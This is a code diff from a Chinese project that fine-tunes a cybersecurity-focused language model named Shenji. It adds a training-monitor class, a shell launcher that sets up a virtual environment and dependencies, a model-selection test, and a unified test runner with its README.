+            with open(self.training_log_file, 'a', encoding='utf-8') as f:
+                f.write(json.dumps(status.__dict__, ensure_ascii=False) + '\n')
+        except Exception as e:
+            self.logger.error(f"保存训练状态失败: {e}")
+    
+    def get_current_status(self) -> Dict[str, Any]:
+        """获取当前状态"""
+        current_system = self.collect_system_status()
+        
+        status = {
+            "monitoring_active": self.training_start_time is not None,
+            "training_duration": None,
+            "system_status": current_system.__dict__ if current_system else None,
+            "training_status": self.last_training_status.__dict__ if self.last_training_status else None
+        }
+        
+        if self.training_start_time:
+            duration = datetime.now() - self.training_start_time
+            status["training_duration"] = str(duration)
+        
+        return status
+    
+    def get_training_history(self, last_n: int = 100) -> List[Dict[str, Any]]:
+        """获取训练历史"""
+        if not self.training_log_file.exists():
+            return []
+        
+        try:
+            with open(self.training_log_file, 'r', encoding='utf-8') as f:
+                lines = f.readlines()
+            
+            # 获取最后N行
+            recent_lines = lines[-last_n:] if len(lines) > last_n else lines
+            
+            history = []
+            for line in recent_lines:
+                try:
+                    data = json.loads(line.strip())
+                    history.append(data)
+                except json.JSONDecodeError:
+                    continue
+            
+            return history
+            
+        except Exception as e:
+            self.logger.error(f"读取训练历史失败: {e}")
+            return []
+    
+    def get_system_history(self, last_n: int = 100) -> List[Dict[str, Any]]:
+        """获取系统监控历史"""
+        if not self.system_log_file.exists():
+            return []
+        
+        try:
+            with open(self.system_log_file, 'r', encoding='utf-8') as f:
+                lines = f.readlines()
+            
+            recent_lines = lines[-last_n:] if len(lines) > last_n else lines
+            
+            history = []
+            for line in recent_lines:
+                try:
+                    data = json.loads(line.strip())
+                    history.append(data)
+                except json.JSONDecodeError:
+                    continue
+            
+            return history
+            
+        except Exception as e:
+            self.logger.error(f"读取系统历史失败: {e}")
+            return []
+    
+    def generate_report(self) -> Dict[str, Any]:
+        """生成监控报告"""
+        training_history = self.get_training_history()
+        system_history = self.get_system_history()
+        
+        report = {
+            "generated_at": datetime.now().isoformat(),
+            "training_summary": self._analyze_training_data(training_history),
+            "system_summary": self._analyze_system_data(system_history),
+            "current_status": self.get_current_status()
+        }
+        
+        return report
+    
+    def _analyze_training_data(self, history: List[Dict[str, Any]]) -> Dict[str, Any]:
+        """分析训练数据"""
+        if not history:
+            return {"status": "无数据"}
+        
+        losses = [item["loss"] for item in history if "loss" in item]
+        
+        if not losses:
+            return {"status": "无损失数据"}
+        
+        return {
+            "total_steps": len(history),
+            "latest_loss": losses[-1],
+            "min_loss": min(losses),
+            "max_loss": max(losses),
+            "avg_loss": sum(losses) / len(losses),
+            "loss_trend": "下降" if len(losses) > 1 and losses[-1] < losses[0] else "上升",
+            "latest_progress": history[-1].get("progress_percent", 0),
+            "estimated_completion": history[-1].get("estimated_time_remaining", "未知")
+        }
+    
+    def _analyze_system_data(self, history: List[Dict[str, Any]]) -> Dict[str, Any]:
+        """分析系统数据"""
+        if not history:
+            return {"status": "无数据"}
+        
+        latest = history[-1]
+        
+        # 计算平均值
+        cpu_usage = [item["cpu_percent"] for item in history if "cpu_percent" in item]
+        memory_usage = [item["memory_percent"] for item in history if "memory_percent" in item]
+        gpu_usage = [item["gpu_utilization"] for item in history if "gpu_utilization" in item]
+        
+        summary = {
+            "latest_cpu_percent": latest.get("cpu_percent", 0),
+            "latest_memory_percent": latest.get("memory_percent", 0),
+            "latest_gpu_utilization": latest.get("gpu_utilization", 0),
+            "disk_free_gb": latest.get("disk_free_gb", 0)
+        }
+        
+        if cpu_usage:
+            summary["avg_cpu_percent"] = sum(cpu_usage) / len(cpu_usage)
+        
+        if memory_usage:
+            summary["avg_memory_percent"] = sum(memory_usage) / len(memory_usage)
+        
+        if gpu_usage:
+            summary["avg_gpu_utilization"] = sum(gpu_usage) / len(gpu_usage)
+        
+        # 资源警告
+        warnings = []
+        if latest.get("memory_percent", 0) > 90:
+            warnings.append("内存使用率过高")
+        if latest.get("disk_free_gb", 0) < 2:
+            warnings.append("磁盘空间不足")
+        if latest.get("gpu_memory_used_gb", 0) / latest.get("gpu_memory_total_gb", 1) > 0.95:
+            warnings.append("GPU内存使用率过高")
+        
+        summary["warnings"] = warnings
+        
+        return summary
+    
+    def save_report(self, filename: Optional[str] = None) -> Path:
+        """保存监控报告"""
+        if filename is None:
+            timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
+            filename = f"training_report_{timestamp}.json"
+        
+        report_path = self.log_dir / filename
+        report = self.generate_report()
+        
+        with open(report_path, 'w', encoding='utf-8') as f:
+            json.dump(report, f, ensure_ascii=False, indent=2)
+        
+        self.logger.info(f"监控报告已保存: {report_path}")
+        return report_path

+ 359 - 0
start_training.sh

@@ -0,0 +1,359 @@
+#!/bin/bash
+# -*- coding: utf-8 -*-
+#
+# 神机网络安全模型自动化训练启动脚本
+#
+# 使用方法:
+# 1. 完整训练: ./start_training.sh
+# 2. 仅数据处理: ./start_training.sh --mode data
+# 3. 仅模型训练: ./start_training.sh --mode train
+# 4. 仅模型测试: ./start_training.sh --mode test
+# 5. 交互模式: ./start_training.sh --mode interactive
+#
+
+set -e  # 遇到错误立即退出
+
+# 颜色定义
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+BLUE='\033[0;34m'
+NC='\033[0m' # No Color
+
+# 日志函数
+log_info() {
+    echo -e "${GREEN}[INFO]${NC} $1"
+}
+
+log_warn() {
+    echo -e "${YELLOW}[WARN]${NC} $1"
+}
+
+log_error() {
+    echo -e "${RED}[ERROR]${NC} $1"
+}
+
+log_step() {
+    echo -e "${BLUE}[STEP]${NC} $1"
+}
+
+# 检查系统环境
+check_system() {
+    log_step "检查系统环境..."
+    
+    # 检查Python
+    if ! command -v python3 &> /dev/null; then
+        log_error "Python3 未安装"
+        exit 1
+    fi
+    
+    python_version=$(python3 -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
+    log_info "Python版本: $python_version"
+    
+    # 检查pip
+    if ! command -v pip3 &> /dev/null; then
+        log_error "pip3 未安装"
+        exit 1
+    fi
+    
+    # screen检查已移除,统一在前台运行
+    
+    # 检查CUDA
+    if command -v nvidia-smi &> /dev/null; then
+        log_info "检测到NVIDIA GPU"
+        nvidia-smi --query-gpu=name,memory.total --format=csv,noheader,nounits | head -1
+    else
+        log_warn "未检测到NVIDIA GPU,将使用CPU训练"
+    fi
+    
+    log_info "系统环境检查完成"
+}
+
+# 配置pip镜像源
+configure_pip_mirror() {
+    log_step "配置pip镜像源..."
+    
+    # 测试网络连接并选择最佳镜像源
+    if ping -c 1 -W 3 pypi.tuna.tsinghua.edu.cn &> /dev/null; then
+        log_info "配置清华大学镜像源"
+        pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple
+        pip config set global.trusted-host pypi.tuna.tsinghua.edu.cn
+    elif ping -c 1 -W 3 mirrors.aliyun.com &> /dev/null; then
+        log_info "配置阿里云镜像源"
+        pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/
+        pip config set global.trusted-host mirrors.aliyun.com
+    elif ping -c 1 -W 3 pypi.douban.com &> /dev/null; then
+        log_info "配置豆瓣镜像源"
+        pip config set global.index-url https://pypi.douban.com/simple/
+        pip config set global.trusted-host pypi.douban.com
+    else
+        log_warn "网络连接检查失败,使用默认源(可能较慢)"
+    fi
+    
+    # 设置其他pip优化参数
+    pip config set global.timeout 300
+    pip config set global.retries 3
+    
+    log_info "当前pip配置:"
+    pip config list || log_warn "无法显示pip配置"
+}
+
+# 设置虚拟环境
+setup_venv() {
+    log_step "设置Python虚拟环境..."
+    
+    VENV_DIR="./venv"
+    
+    if [ ! -d "$VENV_DIR" ]; then
+        log_info "创建虚拟环境..."
+        python3 -m venv "$VENV_DIR"
+    fi
+    
+    log_info "激活虚拟环境..."
+    source "$VENV_DIR/bin/activate"
+    
+    # 配置pip镜像源
+    configure_pip_mirror
+    
+    # 升级pip和构建工具
+    log_info "升级pip、setuptools和wheel..."
+    pip install --upgrade pip setuptools wheel || {
+        log_warn "构建工具升级失败,继续使用当前版本"
+    }
+    
+    log_info "虚拟环境设置完成"
+}
+
+# 安装依赖
+install_dependencies() {
+    log_step "安装Python依赖..."
+    
+    # 优先使用基础依赖文件,避免安装问题
+    if [ -f "requirements-basic.txt" ]; then
+        log_info "使用requirements-basic.txt安装核心依赖..."
+        pip install -r requirements-basic.txt || {
+            log_error "基础依赖安装失败"
+            exit 1
+        }
+        
+        # 尝试安装可选依赖
+        log_info "安装可选依赖..."
+        
+        # 安装bitsandbytes(量化支持)
+        pip install bitsandbytes>=0.39.0 || {
+            log_warn "bitsandbytes安装失败,量化功能可能不可用"
+        }
+        
+        # 安装nvidia-ml-py(GPU监控)
+        if command -v nvidia-smi &> /dev/null; then
+            pip install nvidia-ml-py>=12.535.108 || {
+                log_warn "nvidia-ml-py安装失败,GPU监控功能可能不可用"
+            }
+            
+            # 尝试安装flash-attn
+            log_info "检测到NVIDIA GPU,尝试安装flash-attn(可选)..."
+            log_info "正在预安装torch以支持flash-attn编译..."
+            pip install torch>=2.0.0 || log_warn "torch预安装失败,flash-attn可能无法安装"
+            pip install flash-attn>=2.0.0 --no-build-isolation || {
+                log_warn "flash-attn安装失败,将跳过此依赖(不影响基本功能)"
+                log_warn "如需flash-attn,请手动安装:pip install flash-attn --no-build-isolation"
+            }
+        else
+            log_info "未检测到GPU,跳过GPU相关可选依赖"
+        fi
+        
+    elif [ -f "requirements.txt" ]; then
+        log_info "使用requirements.txt安装依赖..."
+        pip install -r requirements.txt || {
+            log_error "依赖安装失败,请检查requirements.txt"
+            exit 1
+        }
+    else
+        log_error "未找到依赖文件 (requirements-basic.txt 或 requirements.txt)"
+        exit 1
+    fi
+    
+    log_info "依赖安装完成"
+}
+
+# 设置环境变量
+setup_environment() {
+    log_step "设置环境变量..."
+    
+    # 设置HuggingFace缓存目录
+    export HF_HOME="./cache/huggingface"
+    export TRANSFORMERS_CACHE="./cache/transformers"
+    
+    # 设置ModelScope缓存目录
+    export MODELSCOPE_CACHE="./cache/modelscope"
+    
+    # 设置CUDA相关环境变量
+    export CUDA_VISIBLE_DEVICES=0
+    
+    # 设置Python路径
+    export PYTHONPATH="$PWD/src:$PYTHONPATH"
+    
+    log_info "环境变量设置完成"
+}
+
+# 创建日志目录
+setup_logging() {
+    log_step "设置日志目录..."
+    
+    LOG_DIR="./logs"
+    mkdir -p "$LOG_DIR"
+    
+    # 生成日志文件名
+    TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
+    LOG_FILE="$LOG_DIR/training_$TIMESTAMP.log"
+    
+    log_info "日志文件: $LOG_FILE"
+}
+
+# 运行训练
+run_training() {
+    local mode="$1"
+    local additional_args="$2"
+    
+    log_step "开始模型训练..."
+    
+    # 构建命令
+    CMD="python3 main.py --mode $mode $additional_args"
+    
+    log_info "执行命令: $CMD"
+    
+    # 前台运行训练
+    log_info "在前台运行训练..."
+    log_info "提示: 如需后台运行,可使用 screen 或 nohup 命令"
+    $CMD 2>&1 | tee "$LOG_FILE"
+}
+
+# 显示帮助信息
+show_help() {
+    echo "神机网络安全模型自动化训练系统"
+    echo ""
+    echo "使用方法:"
+    echo "  $0 [选项]"
+    echo ""
+    echo "选项:"
+    echo "  --mode MODE          运行模式 (full|data|train|test|interactive|check)"
+    echo "  --force-download     强制重新下载数据"
+    echo "  --model-path PATH    模型路径 (用于test和interactive模式)"
+    echo "  --resume             从最新checkpoint继续训练"
+    echo "  --resume-from PATH   从指定checkpoint路径继续训练"
+    echo "  --model MODEL        选择基础模型 (qwen|chatglm|baichuan|llama等)"
+    echo "  --list-models        列出支持的模型"
+    echo "  --help              显示此帮助信息"
+    echo ""
+    echo "运行模式:"
+    echo "  full                 完整训练流程 (默认)"
+    echo "  data                 仅数据下载和处理"
+    echo "  train                仅模型训练"
+    echo "  test                 仅模型测试"
+    echo "  interactive          交互式对话"
+    echo "  check                检查系统环境"
+    echo ""
+    echo "示例:"
+    echo "  $0                                    # 完整训练"
+    echo "  $0 --mode data --force-download       # 重新下载数据"
+    echo "  $0 --mode train                       # 仅训练模型"
+    echo "  $0 --mode train --resume              # 从最新checkpoint继续训练"
+    echo "  $0 --mode train --model chatglm       # 使用ChatGLM模型训练"
+    echo "  $0 --list-models                      # 列出支持的模型"
+    echo "  $0 --mode test                        # 测试模型"
+    echo "  $0 --mode interactive                 # 交互模式"
+}
+
+# 主函数
+main() {
+    # 默认参数
+    MODE="full"
+    ADDITIONAL_ARGS=""
+    
+    # 如果没有提供任何参数,显示帮助信息
+    if [[ $# -eq 0 ]]; then
+        show_help
+        echo ""
+        echo "提示: 如果要运行完整训练流程,请使用: $0 --mode full"
+        exit 0
+    fi
+    
+    # 解析命令行参数
+    while [[ $# -gt 0 ]]; do
+        case $1 in
+            --mode)
+                MODE="$2"
+                shift 2
+                ;;
+            --force-download)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --force-download"
+                shift
+                ;;
+            --model-path)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --model-path '$2'"
+                shift 2
+                ;;
+            --resume)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --resume"
+                shift
+                ;;
+            --resume-from)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --resume-from '$2'"
+                shift 2
+                ;;
+            --model)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --model '$2'"
+                shift 2
+                ;;
+            --list-models)
+                ADDITIONAL_ARGS="$ADDITIONAL_ARGS --list-models"
+                shift
+                ;;
+            --help)
+                show_help
+                exit 0
+                ;;
+            *)
+                log_error "未知参数: $1"
+                show_help
+                exit 1
+                ;;
+        esac
+    done
+    
+    # 验证模式
+    case $MODE in
+        full|data|train|test|interactive|check)
+            ;;
+        *)
+            log_error "无效的运行模式: $MODE"
+            show_help
+            exit 1
+            ;;
+    esac
+    
+    echo "==========================================="
+    echo "神机网络安全模型自动化训练系统"
+    echo "==========================================="
+    echo "运行模式: $MODE"
+    echo "开始时间: $(date)"
+    echo "==========================================="
+    
+    # 执行步骤
+    check_system
+    setup_venv
+    install_dependencies
+    setup_environment
+    setup_logging
+    
+    # 运行训练
+    run_training "$MODE" "$ADDITIONAL_ARGS"
+    
+    log_info "训练完成"
+}
+
+# 错误处理
+trap 'log_error "脚本执行失败,退出码: $?"' ERR
+
+# 运行主函数
+main "$@"

+ 80 - 0
test_model_selection.py

@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+测试模型选择功能
+"""
+
+import sys
+import os
+
+# 添加src目录到Python路径
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'src'))
+
+def test_download_model_selection():
+    """测试下载模型时的选择功能"""
+    print("=== 测试下载模型选择功能 ===")
+    
+    # 导入下载模块的函数
+    sys.path.insert(0, os.path.dirname(__file__))
+    from download_model import get_user_model_choice
+    
+    try:
+        model_key = get_user_model_choice()
+        print(f"\n选择的模型: {model_key}")
+        
+        # 获取模型配置信息
+        from src.config.model_configs import ModelRegistry
+        registry = ModelRegistry()
+        model_config = registry.get_model_config(model_key)
+        
+        print(f"模型名称: {model_config.name}")
+        print(f"模型ID: {model_config.model_id}")
+        print(f"架构: {model_config.architecture}")
+        
+        return True
+        
+    except Exception as e:
+        print(f"测试失败: {e}")
+        return False
+
+def test_app_model_selection():
+    """测试应用程序中的模型选择功能"""
+    print("\n=== 测试应用程序模型选择功能 ===")
+    
+    try:
+        from src.app import get_user_model_choice
+        
+        model_key = get_user_model_choice()
+        print(f"\n选择的模型: {model_key}")
+        
+        # 设置模型
+        from src.config.settings import Config
+        Config.set_current_model(model_key)
+        print(f"当前模型已设置为: {Config.get_current_model_key()}")
+        
+        return True
+        
+    except Exception as e:
+        print(f"测试失败: {e}")
+        return False
+
+def main():
+    """主函数"""
+    print("模型选择功能测试")
+    print("=" * 50)
+    
+    # 测试1: 下载模型选择
+    success1 = test_download_model_selection()
+    
+    # 测试2: 应用程序模型选择
+    success2 = test_app_model_selection()
+    
+    if success1 and success2:
+        print("\n✅ 所有测试通过!")
+        return 0
+    else:
+        print("\n❌ 部分测试失败")
+        return 1
+
+if __name__ == "__main__":
+    sys.exit(main())

+ 171 - 0
tests/README.md

@@ -0,0 +1,171 @@
+# 神机项目测试框架
+
+## 概述
+
+这是神机项目的统一测试框架,将所有测试功能整合到一个脚本中,避免项目中散落多个测试文件。
+
+## 文件结构
+
+```
+tests/
+├── __init__.py          # 测试模块初始化
+├── test_runner.py       # 统一测试运行器
+└── README.md           # 本说明文件
+```
+
+## 使用方法
+
+### 基本命令
+
+```bash
+# 查看帮助
+python tests/test_runner.py --help
+
+# 列出所有可用测试
+python tests/test_runner.py --list
+
+# 运行所有测试
+python tests/test_runner.py --test all
+```
+
+### 单项测试
+
+```bash
+# 测试身份解决方案
+python tests/test_runner.py --test identity
+
+# 测试数据加载器
+python tests/test_runner.py --test data_loader
+
+# 测试模型下载功能
+python tests/test_runner.py --test download
+
+# 测试Git下载功能
+python tests/test_runner.py --test git_download
+
+# 测试模型推理功能
+python tests/test_runner.py --test inference
+```
+
+## 可用测试项目
+
+### 1. identity - 身份解决方案测试
+- 测试Chat Template功能
+- 验证神机身份设置
+- 检查推理代码集成
+
+### 2. data_loader - 数据加载器测试
+- 测试数据加载器初始化
+- 检查训练数据文件
+- 验证数据处理功能
+
+### 3. download - 模型下载功能测试
+- 测试模型下载器
+- 检查模型文件完整性
+- 验证模型配置文件
+
+### 4. git_download - Git下载功能测试
+- 检查Git环境
+- 验证仓库状态
+- 测试版本控制功能
+
+### 5. inference - 模型推理功能测试
+- 测试推理器初始化
+- 检查模型加载
+- 验证推理接口
+
+### 6. all - 运行所有测试
+- 依次执行所有单项测试
+- 提供测试结果汇总
+- 显示通过率统计
+
+## 添加新测试
+
+要添加新的测试功能,请按以下步骤操作:
+
+1. 在 `TestRunner` 类中添加新的测试方法:
+
+```python
+def test_new_feature(self):
+    """测试新功能"""
+    print("=== 新功能测试 ===")
+    try:
+        # 测试逻辑
+        print("✅ 新功能测试通过")
+        return True
+    except Exception as e:
+        print(f"❌ 新功能测试失败: {e}")
+        return False
+```
+
+2. 在 `__init__` 方法中注册新测试:
+
+```python
+self.tests: Dict[str, Callable] = {
+    # ... 现有测试
+    'new_feature': self.test_new_feature,
+    # ...
+}
+```
+
+3. 更新 `run_all_tests` 方法中的测试列表:
+
+```python
+test_methods = [
+    # ... 现有测试
+    ('新功能', self.test_new_feature),
+    # ...
+]
+```
+
+## 测试输出格式
+
+测试脚本使用统一的输出格式:
+
+- ✅ 表示成功/通过
+- ❌ 表示失败/错误
+- ⚠️ 表示警告/部分成功
+- 📥 表示加载/初始化
+- 📁 表示文件/目录操作
+- 🤖 表示模型相关操作
+- 🔧 表示配置/设置操作
+- 🎉 表示完成/成功
+
+## 注意事项
+
+1. **环境要求**:确保在项目根目录下运行测试
+2. **依赖检查**:某些测试需要特定的依赖包
+3. **资源限制**:模型推理测试可能需要较多内存
+4. **网络连接**:下载相关测试需要网络连接
+5. **权限要求**:某些测试可能需要文件读写权限
+
+## 故障排除
+
+### 常见问题
+
+1. **模块导入失败**
+   - 检查是否在项目根目录下运行
+   - 确认所需依赖包已安装
+
+2. **模型文件不存在**
+   - 运行模型下载测试检查文件状态
+   - 确认模型路径配置正确
+
+3. **权限错误**
+   - 检查文件和目录的读写权限
+   - 确认有足够的磁盘空间
+
+### 调试模式
+
+如果测试失败,可以查看详细的错误信息和堆栈跟踪。测试脚本会自动显示异常详情。
+
+## 维护指南
+
+1. **定期运行**:建议在每次代码更改后运行相关测试
+2. **更新测试**:当添加新功能时,及时添加对应测试
+3. **清理输出**:保持测试输出简洁明了
+4. **文档同步**:更新测试时同步更新本文档
+
+## 版本历史
+
+- v1.0.0 - 初始版本,整合所有现有测试功能

+ 9 - 0
tests/__init__.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+神机项目测试模块
+统一管理所有测试功能
+"""
+
+__version__ = "1.0.0"
+__author__ = "云霖网络安全实验室"

+ 392 - 0
tests/test_runner.py

@@ -0,0 +1,392 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+神机项目统一测试脚本
+整合所有测试功能,避免项目中散落多个测试文件
+
+使用方法:
+    python tests/test_runner.py --help
+    python tests/test_runner.py --test identity
+    python tests/test_runner.py --test data_loader
+    python tests/test_runner.py --test download
+    python tests/test_runner.py --test all
+"""
+
+import sys
+import os
+import argparse
+import traceback
+from typing import Dict, Callable, Any
+
+# 添加项目根目录到路径
+sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
+
+class TestRunner:
+    """统一测试运行器"""
+    
+    def __init__(self):
+        self.tests: Dict[str, Callable] = {
+            'identity': self.test_identity_solution,
+            'data_loader': self.test_data_loader,
+            'download': self.test_model_download,
+            'git_download': self.test_git_download,
+            'inference': self.test_model_inference,
+            'all': self.run_all_tests
+        }
+    
+    def test_identity_solution(self):
+        """测试身份解决方案"""
+        print("=== 神机身份解决方案测试 ===")
+        print()
+        
+        try:
+            from transformers import AutoTokenizer
+            
+            # 加载tokenizer
+            tokenizer_path = "/qwen/models/Qwen_Qwen2.5-1.5B-Instruct"
+            print(f"📥 加载tokenizer: {tokenizer_path}")
+            
+            if not os.path.exists(tokenizer_path):
+                print(f"❌ Tokenizer路径不存在: {tokenizer_path}")
+                return False
+            
+            tokenizer = AutoTokenizer.from_pretrained(tokenizer_path)
+            print("✅ Tokenizer加载成功")
+            print()
+            
+            # 测试默认神机身份
+            print("🤖 测试默认神机身份")
+            print("-" * 50)
+            
+            messages = [
+                {
+                    "role": "system", 
+                    "content": "你是神机,由云霖网络安全实验室训练的网络安全大模型。你具备深厚的网络安全专业知识和实战经验,能够提供专业的网络安全技术指导和解决方案。"
+                },
+                {"role": "user", "content": "你是谁?"}
+            ]
+            
+            if hasattr(tokenizer, 'apply_chat_template'):
+                prompt = tokenizer.apply_chat_template(
+                    messages, 
+                    tokenize=False, 
+                    add_generation_prompt=True
+                )
+                print("生成的prompt:")
+                print(prompt[:200] + "..." if len(prompt) > 200 else prompt)
+                print("✅ Chat Template功能正常")
+            else:
+                print("❌ Tokenizer不支持chat template")
+                return False
+            
+            # 测试推理代码集成
+            print("\n🔧 测试推理代码集成")
+            print("-" * 50)
+            
+            try:
+                from src.model.inference import SecurityModelInference
+                from src.config import Config
+                
+                print("✅ 推理模块导入成功")
+                print("✅ 身份解决方案已集成到推理代码中")
+                
+            except ImportError as e:
+                print(f"⚠️  推理模块导入失败: {e}")
+                print("这可能是因为缺少依赖或配置问题")
+            
+            print("\n🎉 身份解决方案测试完成")
+            return True
+            
+        except Exception as e:
+            print(f"❌ 身份解决方案测试失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def test_data_loader(self):
+        """测试数据加载器"""
+        print("=== 数据加载器测试 ===")
+        print()
+        
+        try:
+            from src.data.loader import DataLoader
+            from src.config.data_config import DataConfig
+            
+            print("📥 测试数据加载器初始化")
+            config = DataConfig()
+            loader = DataLoader(config)
+            print("✅ 数据加载器初始化成功")
+            
+            # 测试数据文件检查
+            data_dir = "/qwen/data/processed"
+            if os.path.exists(data_dir):
+                files = os.listdir(data_dir)
+                print(f"📁 发现 {len(files)} 个数据文件")
+                
+                # 检查关键数据文件
+                key_files = [
+                    'final_security_training_dataset.jsonl',
+                    'security_only_training_dataset.jsonl',
+                    'enhanced_test.jsonl'
+                ]
+                
+                for file in key_files:
+                    if file in files:
+                        file_path = os.path.join(data_dir, file)
+                        size = os.path.getsize(file_path)
+                        print(f"✅ {file}: {size} bytes")
+                    else:
+                        print(f"⚠️  {file}: 文件不存在")
+            else:
+                print(f"❌ 数据目录不存在: {data_dir}")
+                return False
+            
+            print("\n🎉 数据加载器测试完成")
+            return True
+            
+        except Exception as e:
+            print(f"❌ 数据加载器测试失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def test_model_download(self):
+        """测试模型下载功能"""
+        print("=== 模型下载功能测试 ===")
+        print()
+        
+        try:
+            from src.model.downloader import ModelDownloader
+            
+            print("📥 测试模型下载器初始化")
+            downloader = ModelDownloader()
+            print("✅ 模型下载器初始化成功")
+            
+            # 检查模型目录
+            model_dir = "/qwen/models/Qwen_Qwen2.5-1.5B-Instruct"
+            if os.path.exists(model_dir):
+                files = os.listdir(model_dir)
+                print(f"📁 模型目录存在,包含 {len(files)} 个文件")
+                
+                # 检查关键模型文件
+                key_files = [
+                    'config.json',
+                    'tokenizer_config.json',
+                    'tokenizer.json'
+                ]
+                
+                for file in key_files:
+                    if file in files:
+                        print(f"✅ {file}: 存在")
+                    else:
+                        print(f"⚠️  {file}: 不存在")
+                        
+                # 检查模型权重文件
+                weight_files = [f for f in files if f.endswith(('.bin', '.safetensors'))]
+                if weight_files:
+                    print(f"✅ 发现 {len(weight_files)} 个权重文件")
+                else:
+                    print("⚠️  未发现模型权重文件")
+            else:
+                print(f"❌ 模型目录不存在: {model_dir}")
+                return False
+            
+            print("\n🎉 模型下载功能测试完成")
+            return True
+            
+        except Exception as e:
+            print(f"❌ 模型下载功能测试失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def test_git_download(self):
+        """测试Git下载功能"""
+        print("=== Git下载功能测试 ===")
+        print()
+        
+        try:
+            import subprocess
+            
+            # 检查git是否可用
+            result = subprocess.run(['git', '--version'], 
+                                  capture_output=True, text=True)
+            if result.returncode == 0:
+                print(f"✅ Git可用: {result.stdout.strip()}")
+            else:
+                print("❌ Git不可用")
+                return False
+            
+            # 检查是否在git仓库中
+            result = subprocess.run(['git', 'status'], 
+                                  capture_output=True, text=True, 
+                                  cwd='/qwen')
+            if result.returncode == 0:
+                print("✅ 项目在Git仓库中")
+            else:
+                print("⚠️  项目不在Git仓库中")
+            
+            print("\n🎉 Git下载功能测试完成")
+            return True
+            
+        except Exception as e:
+            print(f"❌ Git下载功能测试失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def test_model_inference(self):
+        """测试模型推理功能"""
+        print("=== 模型推理功能测试 ===")
+        print()
+        
+        try:
+            from src.model.inference import SecurityModelInference
+            from src.config import Config
+            
+            print("📥 测试推理器初始化")
+            config = Config()
+            inference = SecurityModelInference(config)
+            print("✅ 推理器初始化成功")
+            
+            # 检查模型路径
+            model_path = "/qwen/models/Qwen_Qwen2.5-1.5B-Instruct"
+            if os.path.exists(model_path):
+                print(f"✅ 模型路径存在: {model_path}")
+                
+                # 尝试加载tokenizer(不加载完整模型以节省资源)
+                try:
+                    from transformers import AutoTokenizer
+                    tokenizer = AutoTokenizer.from_pretrained(model_path)
+                    print("✅ Tokenizer加载成功")
+                    
+                    # 测试chat方法的参数
+                    print("✅ 推理器支持动态身份设置")
+                    
+                except Exception as e:
+                    print(f"⚠️  Tokenizer加载失败: {e}")
+            else:
+                print(f"❌ 模型路径不存在: {model_path}")
+                return False
+            
+            print("\n🎉 模型推理功能测试完成")
+            return True
+            
+        except Exception as e:
+            print(f"❌ 模型推理功能测试失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def run_all_tests(self):
+        """运行所有测试"""
+        print("=== 运行所有测试 ===")
+        print()
+        
+        test_methods = [
+            ('身份解决方案', self.test_identity_solution),
+            ('数据加载器', self.test_data_loader),
+            ('模型下载', self.test_model_download),
+            ('Git下载', self.test_git_download),
+            ('模型推理', self.test_model_inference)
+        ]
+        
+        results = []
+        for name, test_func in test_methods:
+            print(f"\n{'='*60}")
+            print(f"开始测试: {name}")
+            print(f"{'='*60}")
+            
+            try:
+                result = test_func()
+                results.append((name, result))
+            except Exception as e:
+                print(f"❌ {name}测试异常: {e}")
+                results.append((name, False))
+        
+        # 汇总结果
+        print(f"\n{'='*60}")
+        print("测试结果汇总")
+        print(f"{'='*60}")
+        
+        passed = 0
+        total = len(results)
+        
+        for name, result in results:
+            status = "✅ 通过" if result else "❌ 失败"
+            print(f"{name}: {status}")
+            if result:
+                passed += 1
+        
+        print(f"\n总计: {passed}/{total} 个测试通过")
+        
+        if passed == total:
+            print("🎉 所有测试通过!")
+        else:
+            print("⚠️  部分测试失败,请检查相关功能")
+        
+        return passed == total
+    
+    def run_test(self, test_name: str) -> bool:
+        """运行指定测试"""
+        if test_name not in self.tests:
+            print(f"❌ 未知的测试: {test_name}")
+            print(f"可用的测试: {', '.join(self.tests.keys())}")
+            return False
+        
+        print(f"开始运行测试: {test_name}")
+        print("=" * 60)
+        
+        try:
+            return self.tests[test_name]()
+        except Exception as e:
+            print(f"❌ 测试 {test_name} 执行失败: {e}")
+            traceback.print_exc()
+            return False
+    
+    def list_tests(self):
+        """列出所有可用测试"""
+        print("可用的测试:")
+        for test_name in self.tests.keys():
+            if test_name != 'all':
+                print(f"  - {test_name}")
+        print(f"  - all (运行所有测试)")
+
+def main():
+    """主函数"""
+    parser = argparse.ArgumentParser(
+        description="神机项目统一测试脚本",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+示例:
+  python tests/test_runner.py --test identity     # 测试身份解决方案
+  python tests/test_runner.py --test data_loader  # 测试数据加载器
+  python tests/test_runner.py --test all          # 运行所有测试
+  python tests/test_runner.py --list              # 列出所有测试
+        """
+    )
+    
+    parser.add_argument(
+        '--test', '-t',
+        type=str,
+        help='要运行的测试名称'
+    )
+    
+    parser.add_argument(
+        '--list', '-l',
+        action='store_true',
+        help='列出所有可用的测试'
+    )
+    
+    args = parser.parse_args()
+    
+    runner = TestRunner()
+    
+    if args.list:
+        runner.list_tests()
+        return
+    
+    if args.test:
+        success = runner.run_test(args.test)
+        sys.exit(0 if success else 1)
+    else:
+        parser.print_help()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()

Algunos archivos no se mostraron porque demasiados archivos cambiaron en este cambio